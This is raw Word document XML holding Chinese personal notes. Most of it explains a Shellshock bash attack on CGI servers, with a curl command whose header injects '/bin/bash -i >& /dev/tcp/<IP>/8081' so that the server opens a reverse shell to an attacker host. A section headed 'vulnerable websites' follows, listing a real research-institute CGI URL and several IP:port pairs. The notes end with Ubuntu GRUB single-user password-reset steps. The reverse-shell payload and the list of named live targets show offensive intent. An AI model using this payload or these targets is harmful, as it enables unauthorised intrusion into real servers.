                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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该命令生成一个含有自定义字段”A_Custom_Header”的请求发给远程的基于Apache的cgi服务器，该字段的值被设置为一个可以触发该bash漏洞的字符串，其中的”/bin/bash......0&gt;&amp;1”是被执行在远程主机上的命令，作用是反弹一个远程bash shell（也可以是其它shell）到黑客主机的8080端口。被请求的cgi页面为</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001348BA">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="336699"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://10.20.230.63/cgi-bin/vul_cgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。而在黑客主机上使用netcat**8080端口等待被黑服务器的远程连接：</w:t>
      </w:r>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4352925" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="218" name="图片 218" descr="说明: 图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descr="说明: 图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52925" cy="609600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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执行上面的curl命令后发生了以下几件事情：</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1、远程主机使用bash解释器创建一个名为”A_Custom_Header”的环境变量并赋值为”() { :;};/bin/bash......0&gt;&amp;1”；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="001348BA" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2、由于存在漏洞，bash“顺便”将’/bin/bash......0&gt;&amp;1’作为命令执行；</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3、用户提交的恶意命令创建一个/bin/bash进程并创建socket将bash的IO链接至黑客机器10.20.230.63:8080（该测试案例中黑客机器和服务器为同一台机器，当然可以不同）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="001348BA" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4、黑客主机的netcat收到来自被攻击服务器的socket链接，并获取远程shell的IO如下图：</w:t>
      </w:r>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4400550" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="217" name="图片 217" descr="说明: 图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descr="说明: 图5.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00550" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="001348BA" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D699E">
        <w:t>curl -H 'A_Custom_Header: () { :;}; /bin/bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidRPr="004D699E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>220.181.64.161</w:t>
      </w:r>
      <w:r w:rsidRPr="004D699E">
        <w:t>/8081 0&gt;&amp;1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000466EA">
        <w:t>http://220.181.64.161:8080/cgi-bin/xlfd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红色部分代表要反弹到的地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>有漏洞的网址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00F50BB3" w:rsidP="00D35B85">
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00D35B85" w:rsidRPr="00D46560">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>http://genomics.cafs.ac.cn/fpc/cgi-bin/WebAGCoL/WebFcmp/fcmp.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00066A0E">
        <w:t>212.95.71.32:59925</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B35FCB">
        <w:t>92.243.9.215:55149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vnc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行进入重置密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00340593" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入单用户模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、开机到</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>grub</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，用上下键移到第二行的恢复模式，按</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（注意不是回车）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>With Linux 3.2.0-23-generic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>recovery mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、把</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ro recovery nomodeset </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>改成</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rw single init=/bin/bash     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后按</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ctrl+x </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">F10   </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就可以进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单用户模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5543550" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216" name="图片 216" descr="说明: http://f.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=b9420adf35a85edffad9f6257964251b/37d3d539b6003af33ff4bfef342ac65c1138b6f6.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId28" tooltip="&quot;点击查看大图&quot; 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descr="说明: http://f.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=b9420adf35a85edffad9f6257964251b/37d3d539b6003af33ff4bfef342ac65c1138b6f6.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43550" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FEDD"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5EBB0B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5EBB0B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>提问者评价</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这个方法可行，谢谢</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="008D6351" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1FED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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
